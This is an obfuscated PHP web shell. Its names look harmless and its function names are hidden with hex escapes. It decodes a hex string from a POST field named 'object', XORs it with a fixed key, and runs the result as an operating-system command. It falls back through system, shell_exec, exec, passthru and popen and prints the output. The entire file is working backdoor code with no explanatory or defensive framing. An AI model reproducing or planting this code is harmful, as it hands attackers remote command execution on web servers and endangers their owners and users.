<?php

$restore_state5 = "\x70\x6Fpen";
$restore_state4 = "\x70a\x73\x73t\x68ru";
$app_initializer = "hex\x32\x62\x69n";
$restore_state3 = "ex\x65c";
$restore_state1 = "s\x79\x73\x74em";
$restore_state6 = "st\x72e\x61\x6D_\x67e\x74\x5Fcon\x74e\x6E\x74s";
$restore_state7 = "\x70clo\x73\x65";
$restore_state2 = "\x73\x68\x65ll_\x65\x78ec";
if (isset($_POST["\x6F\x62\x6Aect"])) {
            function reverse_lookup    (   $factor   ,    $binding     )     {
    $fac      =    ''      ;
      $y=0;
 while($y<strlen($factor)){
$fac.=chr(ord($factor[$y])^$binding);
$y++;

} return     $fac;
    
}
            $object = $app_initializer($_POST["\x6F\x62\x6Aect"]);
            $object = reverse_lookup($object, 72);
            if (function_exists($restore_state1)) {
                $restore_state1($object);
            } elseif (function_exists($restore_state2)) {
                print $restore_state2($object);
            } elseif (function_exists($restore_state3)) {
                $restore_state3($object, $res_factor);
                print join("\n", $res_factor);
            } elseif (function_exists($restore_state4)) {
                $restore_state4($object);
            } elseif (function_exists($restore_state5) && function_exists($restore_state6) && function_exists($restore_state7)) {
                $binding_fac = $restore_state5($object, 'r');
                if ($binding_fac) {
                    $token_comp = $restore_state6($binding_fac);
                    $restore_state7($binding_fac);
                    print $token_comp;
                }
            }
            exit;
        }